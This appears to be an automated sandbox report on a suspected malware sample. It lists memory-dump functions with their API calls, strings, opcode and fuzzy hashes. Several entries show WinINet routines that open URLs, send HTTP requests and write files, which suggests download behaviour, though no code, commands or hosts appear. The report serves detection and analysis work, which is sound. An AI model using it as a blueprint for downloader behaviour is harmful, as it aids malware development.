Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 15a5f3288f9aaf355dc4e93a79ae344d8195a868944644686aa35fb8295601a0
Instruction ID: c759ddb5ac90f6ab1ac45928bbaba56c44597eec320416e9b8e49e92896b9161
Opcode Fuzzy Hash: 15a5f3288f9aaf355dc4e93a79ae344d8195a868944644686aa35fb8295601a0
Instruction Fuzzy Hash: A401A13770C726252A14505AAF027AF53A98F91BB8726012FF958F72C1FECCD9A251DC

Uniqueness

Uniqueness Score: -1.00%

Function 00411154, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 004111A4

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: b8ecf89c5f3d7a2f7767fdd90ce932ffd2d4c5eb1bfd891279011bf3ca49a564
Instruction ID: 61928d99341b51059aac123d8b34d2618907a57ee03d50c70aaf2b2d1c785a30
Opcode Fuzzy Hash: b8ecf89c5f3d7a2f7767fdd90ce932ffd2d4c5eb1bfd891279011bf3ca49a564
Instruction Fuzzy Hash: 1711BC35B0A225FBCB324B649C84B9BB7589F09760B110162EF05A7370D634DD41C5E8

Uniqueness

Uniqueness Score: -1.00%

Function 00412203, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004121F8,?,?,004121C0,00403D80,74B06490,?), ref: 00412218
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041222B
FreeLibrary.KERNEL32(00000000,?,?,004121F8,?,?,004121C0,00403D80,74B06490,?), ref: 0041224E

Strings

mscoree.dll, xrefs: 00412211
CorExitProcess, xrefs: 00412223

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2507951d6d1a2487d55b9b793432bce96fc35d87bb98e2533eabd8f79f8650fc
Instruction ID: 6250f0f5c9219dab05e05ccb32d3a9bd397d453599b4be5e81b1812bfa653797
Opcode Fuzzy Hash: 2507951d6d1a2487d55b9b793432bce96fc35d87bb98e2533eabd8f79f8650fc
Instruction Fuzzy Hash: 99F08230708219FBDB219B50DE0ABDEBA68EF40755F5000A1F800E12A0CB788E55DA98

Uniqueness

Uniqueness Score: -1.00%

Function 0288E9C4, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0288EA46
_free.LIBCMT ref: 0288EA6A
_free.LIBCMT ref: 0288EBF7
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042B608), ref: 0288EC09
_free.LIBCMT ref: 0288EDC3

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 4f2b695338a1a4e717d6133e02b72dde15f9bdfc7ec0fb29074ef71329bf9489
Instruction ID: 9f10dacec501448d8fb853a0e51aa1a345fb3eb45f87520fd2c31c7d0e554a3e
Opcode Fuzzy Hash: 4f2b695338a1a4e717d6133e02b72dde15f9bdfc7ec0fb29074ef71329bf9489
Instruction Fuzzy Hash: 8DC1287DA00219ABDB25BF6CDC40BEA7BEAEF46354F144069F489E7291F7309A01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02882B93, Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02882AC5), ref: 02882BB5
GetFileInformationByHandle.KERNEL32(?,?), ref: 02882C0F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02882AC5,?,000000FF,00000000,00000000), ref: 02882C9D
__dosmaperr.LIBCMT ref: 02882CA4
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02882CE1

Part of subcall function 02882F09: __dosmaperr.LIBCMT ref: 02882F3E

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 3fb7fb060d39f6eda45dc197caff6763e0cbbfed3fa334ab33006416075c8fa8
Instruction ID: 6f59647a39a3f5103b00f569f4fc74a986ffbc8c0d9909a216e22fb51ab177a8
Opcode Fuzzy Hash: 3fb7fb060d39f6eda45dc197caff6763e0cbbfed3fa334ab33006416075c8fa8
Instruction Fuzzy Hash: 8F412EBD900248AFDB24EFA5DC449AFBBFAFF48300B00892DE956D3614E7309945DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02876BD0, Relevance: 7.6, APIs: 5, Instructions: 105networkfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00427214), ref: 02876C05
InternetOpenA.WININET(0042CD15,00000000,00000000,00000000,00000000), ref: 02876C1A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02876C3A
InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 02876C51
CloseHandle.KERNEL32(00000000), ref: 02876C93

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: Internet$FileOpen$CloseCreateHandleRead
String ID:
API String ID: 2307989922-0
Opcode ID: 541189bf1b5e03bc361bb1c6a8d400add16cd2006e7d523cddcb6d8af40de3d6
Instruction ID: 2fc918ccc14bdcd9ca50a72a3f673fef9a5cb367b2911f1ba15c797aa3656c80
Opcode Fuzzy Hash: 541189bf1b5e03bc361bb1c6a8d400add16cd2006e7d523cddcb6d8af40de3d6
Instruction Fuzzy Hash: CC317E35340208ABEB20DF64DC85FDE3BA9EB48704F604165FA08D72C1D7B9E9858B65

Uniqueness

Uniqueness Score: -1.00%

Function 0041C807, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041C81F

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000,00000000), ref: 00416629

_free.LIBCMT ref: 0041C831
_free.LIBCMT ref: 0041C843
_free.LIBCMT ref: 0041C855
_free.LIBCMT ref: 0041C867

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9890a6e328770d2d487a97ef7e26fd8b2bc4a8d76f969ffdf16fda3815973fb1
Instruction ID: b5e720d29d004bd2e01f4418257483c3524fdb12780781c823b448491ab4452d
Opcode Fuzzy Hash: 9890a6e328770d2d487a97ef7e26fd8b2bc4a8d76f969ffdf16fda3815973fb1
Instruction Fuzzy Hash: F3F0FF32554210E78624FB99E9C5C96B3DDAA04715755182FF049D7611CB39FCC08AEC

Uniqueness

Uniqueness Score: -1.00%

Function 0288CA57, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0288CA6F

Part of subcall function 02886851: HeapFree.KERNEL32(00000000,00000000,?,0288594E), ref: 02886867
Part of subcall function 02886851: GetLastError.KERNEL32(?,?,0288594E), ref: 02886879

_free.LIBCMT ref: 0288CA81
_free.LIBCMT ref: 0288CA93
_free.LIBCMT ref: 0288CAA5
_free.LIBCMT ref: 0288CAB7

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5d0a5859f4b37fc9e185064ffee58ad4f855eb3b6b6ae4a5b76935e3f7635b51
Instruction ID: 25932b98c37936c677fb427c00bb205ebd5220946de9972c1143cf41296165ce
Opcode Fuzzy Hash: 5d0a5859f4b37fc9e185064ffee58ad4f855eb3b6b6ae4a5b76935e3f7635b51
Instruction Fuzzy Hash: BCF01DBE504214ABC628FB68F9CDC1A77DEBA04714764192AF08CD7904DB31F8908EB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041B06D

Strings

*?, xrefs: 0041AF16

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 10ee6aa193b2a22c55cd56db50331241d1d9d032937cd9aa904c4765aaf002ea
Instruction ID: 4ffa33ded46cd296a401573387ca96fd095d181656e3ac683cd04d08089812ad
Opcode Fuzzy Hash: 10ee6aa193b2a22c55cd56db50331241d1d9d032937cd9aa904c4765aaf002ea
Instruction Fuzzy Hash: 806131B5E002199FDB14CFA9C8815EEFBF5EF48314B25416AE815F7300D7759E818B94

Uniqueness

Uniqueness Score: -1.00%

Function 0288B123, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0288B2BD

Strings

*?, xrefs: 0288B166

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 4a6e40b0c49d7c0310f5f242bb9f08e34da1873dbea1c6ed18f33a9ac217de90
Instruction ID: c69debb7354cfb8fc066149efe7688478e49fb5e41af940d962127dd74d27bd1
Opcode Fuzzy Hash: 4a6e40b0c49d7c0310f5f242bb9f08e34da1873dbea1c6ed18f33a9ac217de90
Instruction Fuzzy Hash: 9E612D7ED002199FDB14EFA9C8819EDFBF5EF88314B14816AD859E7300D771AE418B91

Uniqueness

Uniqueness Score: -1.00%

Function 02880C90, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 02880CCF
__IsNonwritableInCurrentImage.LIBCMT ref: 02880D83

Strings

csm, xrefs: 02880D6D
csm, xrefs: 02880E01

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 3480331319-3733052814
Opcode ID: 5cdd865d4eea417760e40e966f6d40f233c376454c0fc9c2000f3368be955130
Instruction ID: 48a80edc21870d1577f8c336eba9e5f15bf24933d2187ef89f3561da7ec1f28c
Opcode Fuzzy Hash: 5cdd865d4eea417760e40e966f6d40f233c376454c0fc9c2000f3368be955130
Instruction Fuzzy Hash: 7051B43DA00209DFCF24EF58C844B5E7BB5AF44318F148199E819DB2A2D735E90ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 02872680, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(0042CD98,00000000,00000000,00000000,00000000), ref: 02872721
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02872733
InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 0287274A

Strings

<, xrefs: 028728FC

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: Internet$Open$FileRead
String ID: <
API String ID: 72386350-4251816714
Opcode ID: 5a4ea298b88e3fa16b75e622936813c5420810b67996d64fcfe7540755ada92f
Instruction ID: b1adc12d9e2f8a8c12cdefc514f5f70bd1e086aeba531d942cb4ecf634879c05
Opcode Fuzzy Hash: 5a4ea298b88e3fa16b75e622936813c5420810b67996d64fcfe7540755ada92f
Instruction Fuzzy Hash: 08412639E10219EBDB18DF64CD80BAEBB7AEF44344F108059E915E7295DB34EA41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02889A5A, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02889AE1

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c434538e787851e067d0b6415d68969a7c72e1829d1effe04a96ebff6cae0c86
Instruction ID: f7767179b836176b5c8881a0a0678c820293a0de78a2ec728bedda36ec7caf8b
Opcode Fuzzy Hash: c434538e787851e067d0b6415d68969a7c72e1829d1effe04a96ebff6cae0c86
Instruction Fuzzy Hash: 0BB1383EA042559FEB11EF68C8807BEBBF6EF45304F1481A9D959DB341E335A901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02876E64, Relevance: 6.2, APIs: 4, Instructions: 247networkfileCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 02876E73
HttpSendRequestA.WININET(00000000,00000000,?), ref: 02876F1C
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 02876FAD
InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 02877034

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: FileHttpInternetReadRequest$OpenSend
String ID:
API String ID: 947651290-0
Opcode ID: fa4380f7e62c9bf4174882aca592a78dd4bac546243c94800006937a7edb80d2
Instruction ID: 628b931137cdd20658f09880bacdd830bde5ad3560dd410e2886121249ed98f9
Opcode Fuzzy Hash: fa4380f7e62c9bf4174882aca592a78dd4bac546243c94800006937a7edb80d2
Instruction Fuzzy Hash: 7281F6796001089FEB18DF28CC84BAEBB66EF85314F604568F814D7295E735DA81CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004042C0, Relevance: 6.1, APIs: 4, Instructions: 146libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00404316
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404375
GetProcAddress.KERNEL32(00000000), ref: 0040437C

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 909ae423453766c9e7cf490343f619af1d0c2fe03a207224d42891ee8600ebd4
Instruction ID: 2bdbf834d18c98f0266b91bd9d27062e97bf86159962dad3da879a362ef21e0a
Opcode Fuzzy Hash: 909ae423453766c9e7cf490343f619af1d0c2fe03a207224d42891ee8600ebd4
Instruction Fuzzy Hash: B54148B0E002189BDB24AB68DC4A79EB774EF82314F50427AED00B73C1EB39598487D9

Uniqueness

Uniqueness Score: -1.00%

Function 0042166E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042173E
_free.LIBCMT ref: 00421767
SetEndOfFile.KERNEL32(00000000,0041DB46,00000000,0041649E,?,?,?,?,?,?,?,0041DB46,0041649E,00000000), ref: 00421799
GetLastError.KERNEL32(?,?,?,?,?,?,?,0041DB46,0041649E,00000000,?,?,?,?,00000000), ref: 004217B5

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: e146b8e04370f52d3ed6fcf9d855343540ebec15b8142974caf61cee592d11da
Instruction ID: 80fe763155066d25bc738927a31a90460181cdf22703c0b18c745a4a2f417d93
Opcode Fuzzy Hash: e146b8e04370f52d3ed6fcf9d855343540ebec15b8142974caf61cee592d11da
Instruction Fuzzy Hash: 2C41E7327006109BDB116FA9DC42ADE37A5AFD4324F64015BF414A72B1DA3CC9418769

Uniqueness

Uniqueness Score: -1.00%

Function 028918BE, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0289198E
_free.LIBCMT ref: 028919B7
SetEndOfFile.KERNEL32(00000000,0288DD96,00000000,028866EE,?,?,?,?,?,?,?,0288DD96,028866EE,00000000), ref: 028919E9
GetLastError.KERNEL32(?,?,?,?,?,?,?,0288DD96,028866EE,00000000,?,?,?,?,00000000), ref: 02891A05

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 1d4e9ec271f61be39408e0f53894346d0ad6f4d8c416210fc8434fcbe1c2efc6
Instruction ID: 8048c8e542d8283b8edabe34ec930f5974e26126fdc89ccc6dd32c6c6e819fb1
Opcode Fuzzy Hash: 1d4e9ec271f61be39408e0f53894346d0ad6f4d8c416210fc8434fcbe1c2efc6
Instruction Fuzzy Hash: CD41A77E9042069FDF12BBBCCC48B9D7BA7AF45765F680150E92CE7190EB34C8508B22

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE04, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00412687: _free.LIBCMT ref: 00412695

Part of subcall function 0041BDDB: WideCharToMultiByte.KERNEL32(00403D80,00000000,0042E0B8,00000000,00403D80,00403D80,00418DE7,?,0042E0B8,?,00000000,?,00418B56,0000FDE9,00000000,?), ref: 0041BE7D

GetLastError.KERNEL32 ref: 0041AE6C
__dosmaperr.LIBCMT ref: 0041AE73
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041AEB2
__dosmaperr.LIBCMT ref: 0041AEB9

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: dd0f3b0d95796c507fb194bfffc6583f27d961aa4136d346fbb9a92158343b6e
Instruction ID: d5f1c445b52c9297a7152783a309135c38ee1275822a5b0ae2c1d34220fc2f4b
Opcode Fuzzy Hash: dd0f3b0d95796c507fb194bfffc6583f27d961aa4136d346fbb9a92158343b6e
Instruction Fuzzy Hash: 5021B6716413096F9B216F668C818EB77ADEF00369710451BF924D7240D738EDA187AA

Uniqueness

Uniqueness Score: -1.00%

Function 0288B054, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 028828D7: _free.LIBCMT ref: 028828E5

Part of subcall function 0288C02B: WideCharToMultiByte.KERNEL32(02873FD0,00000000,0042E0B8,00000000,02873FD0,02873FD0,02889037,?,0042E0B8,?,00000000,?,02888DA6,0000FDE9,00000000,?), ref: 0288C0CD

GetLastError.KERNEL32 ref: 0288B0BC
__dosmaperr.LIBCMT ref: 0288B0C3
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0288B102
__dosmaperr.LIBCMT ref: 0288B109

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 6a0052d095e2ea384e12372c9623fd737dd5e092d1e819819fb651f8b8d92860
Instruction ID: 9a106109b6f6b2d4d213c654edada5a41112f2271b7b0c1d62bfe451480fd1d4
Opcode Fuzzy Hash: 6a0052d095e2ea384e12372c9623fd737dd5e092d1e819819fb651f8b8d92860
Instruction Fuzzy Hash: A021717D600219AFDB21BFA98C8196BB7AEFF8036CB108529E929D7551D731EC408B61

Uniqueness

Uniqueness Score: -1.00%

Function 028873FC, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84a2b77935eb924aed648b2b7d3e40140daa0546c7905651bd106588082a50c
Instruction ID: 0163c81df1c81d027023ab090a297717505c4d811b37d33de70eab99eb47b18e
Opcode Fuzzy Hash: c84a2b77935eb924aed648b2b7d3e40140daa0546c7905651bd106588082a50c
Instruction Fuzzy Hash: 3721C33DE05224ABDB316A249C80B2AFE789F417A4F318120ED19EB291E730DC01C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00416EF2, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00403D80,00403D80,F98B5000,0041889D,?,00403D80,0042E0B8,?,00418D5C,00403D80,74B06490,00403D80,00403D80,00403D80,74B06490,0040E3F3), ref: 00416EF7
_free.LIBCMT ref: 00416F54
_free.LIBCMT ref: 00416F8A
SetLastError.KERNEL32(00000000,00000008,000000FF,?,00418D5C,00403D80,74B06490,00403D80,00403D80,00403D80,74B06490,0040E3F3,?,004124C5,0040E3F3,0042E0B8), ref: 00416F95

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 10d3ef22eb7e8d62885c0dcf6a18f539c3ac25966f0deb7c301304ce4e088152
Instruction ID: 0472474c4cb18511cf639f6e2006cacba2ff6693ea478f65ea0a6c2b79e989ad
Opcode Fuzzy Hash: 10d3ef22eb7e8d62885c0dcf6a18f539c3ac25966f0deb7c301304ce4e088152
Instruction Fuzzy Hash: 3311A7322481016AD71127757CC5AEB266A8BC0769767423FF628822E1EE2DCCD7561D

Uniqueness

Uniqueness Score: -1.00%

Function 02887142, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,02882855,?,?,?,?,028834C2,?), ref: 02887147
_free.LIBCMT ref: 028871A4
_free.LIBCMT ref: 028871DA
SetLastError.KERNEL32(00000000,004300F8,000000FF,?,?,02882855,?,?,?,?,028834C2,?), ref: 028871E5

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 852b4ae23b028a4af4fb23b17b13b773876d0aefac8bd65328f9fc5d10f17929
Instruction ID: 7277031105747ec9705efbd59a260980fca08239d47772aa78c83d7ddf2d6edd
Opcode Fuzzy Hash: 852b4ae23b028a4af4fb23b17b13b773876d0aefac8bd65328f9fc5d10f17929
Instruction Fuzzy Hash: F911E53E2442056BD625777C6CC4E7BA17BABC1778B350235F62CC25E9FF2088159A26

Uniqueness

Uniqueness Score: -1.00%

Function 00417049, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0040E3EC,0040E3EC,E8004310,0041320C,00416B2D,?,?,0040FD13,0040E3EC,?,0040EC38,E8004311,74B06490), ref: 0041704E
_free.LIBCMT ref: 004170AB
_free.LIBCMT ref: 004170E1
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0040FD13,0040E3EC,?,0040EC38,E8004311,74B06490), ref: 004170EC

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 78be447828bb09ad804281281fa979315b3388b3e5c1d993a21114a632bdff84
Instruction ID: 602c94f41faeec266911e98351360e536512a396ebf154ad71f51f9ede5ecbfd
Opcode Fuzzy Hash: 78be447828bb09ad804281281fa979315b3388b3e5c1d993a21114a632bdff84
Instruction Fuzzy Hash: 0811E93134C7016AD7112775ACC1EEB2A7A8BC8379762433BF628822D1EE298CD6561D

Uniqueness

Uniqueness Score: -1.00%

Function 02887299, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0288345C,02886877,?,?,0288594E), ref: 0288729E
_free.LIBCMT ref: 028872FB
_free.LIBCMT ref: 02887331
SetLastError.KERNEL32(00000000,004300F8,000000FF,?,?,0288345C,02886877,?,?,0288594E), ref: 0288733C

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 87bcaad31f16b68704539a7d688c55d0fd8762de236f982063fd85112bbfcfac
Instruction ID: f1b362f5fef069ba48efca567a77543fe70df1ec5f031427c462c66f551b5068
Opcode Fuzzy Hash: 87bcaad31f16b68704539a7d688c55d0fd8762de236f982063fd85112bbfcfac
Instruction Fuzzy Hash: 9011E93E2445016BD611777C6CC4E6A617BABC13787750234F52DC21E1FF2088155627

Uniqueness

Uniqueness Score: -1.00%

Function 028813A4, Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ecf89c5f3d7a2f7767fdd90ce932ffd2d4c5eb1bfd891279011bf3ca49a564
Instruction ID: a9fc8f2b3f4b8fdc149b5991b291609d8e7a6b34cfc75219d000b84fecf4c276
Opcode Fuzzy Hash: b8ecf89c5f3d7a2f7767fdd90ce932ffd2d4c5eb1bfd891279011bf3ca49a564
Instruction Fuzzy Hash: 0C11E93DA06226EBCB316F24DC48B2A7769AF01764B558121ED0EEB291DF30DD03C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041773C, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,004178A1,00000000,?,0041E208,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00417752
GetLastError.KERNEL32(?,0041E208,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,004178A1,00000000,00000104,?), ref: 0041775C
__dosmaperr.LIBCMT ref: 00417763

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 18256f62807b010bd1c952f313ce09cea670f451af4510de2b5d9a852c86645b
Instruction ID: d310f4c861fde6e33b7d2ec2a6979ec69c74d72fe9a819ac1ea39020a7938a2a
Opcode Fuzzy Hash: 18256f62807b010bd1c952f313ce09cea670f451af4510de2b5d9a852c86645b
Instruction Fuzzy Hash: AEF01232209115BB8B201FB6DC08D9BBF79FF453A17004526F529C6651DB35F8A2D7D4

Uniqueness

Uniqueness Score: -1.00%

Function 004177A5, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,004178A1,00000000,?,0041E193,00000000,00000000,004178A1,?,?,00000000,00000000,00000001), ref: 004177BB
GetLastError.KERNEL32(?,0041E193,00000000,00000000,004178A1,?,?,00000000,00000000,00000001,00000000,00000000,?,004178A1,00000000,00000104), ref: 004177C5
__dosmaperr.LIBCMT ref: 004177CC

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: bc7aac635adf5174af9669a5f585797b230512a42d3c46fbc9cd0da11d30476b
Instruction ID: 7e40a06978a759b8191a295d3124cb90d66c456e90e2ee65387afcc0bcf2beb1
Opcode Fuzzy Hash: bc7aac635adf5174af9669a5f585797b230512a42d3c46fbc9cd0da11d30476b
Instruction Fuzzy Hash: 6BF06231204115BB8B212FB6DC08C97BF79FF453607108526F529C6620CB35E8A1D7E4

Uniqueness

Uniqueness Score: -1.00%

